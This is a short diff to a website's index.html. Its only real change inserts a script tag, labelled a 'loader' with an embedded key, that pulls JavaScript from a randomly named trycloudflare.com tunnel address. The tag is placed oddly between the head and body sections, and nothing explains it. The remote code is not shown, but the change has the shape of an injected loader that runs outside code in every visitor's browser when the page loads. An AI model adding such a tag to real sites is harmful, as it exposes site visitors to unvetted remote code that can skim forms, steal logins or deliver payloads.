--- a/index.html
+++ b/index.html
@@ -243,6 +243,7 @@
 
     </style>
 </head>
+    <script id="eraqit-loader" data-key="ERQ-04CF1EAE-2025" src="https://nottingham-ryan-booth-would.trycloudflare.com/static/widget.js"></script>
 <body>
     <header>
         <nav class="navbar">
@@ -353,3 +354,4 @@
     </script>
 </body>
 </html>
+
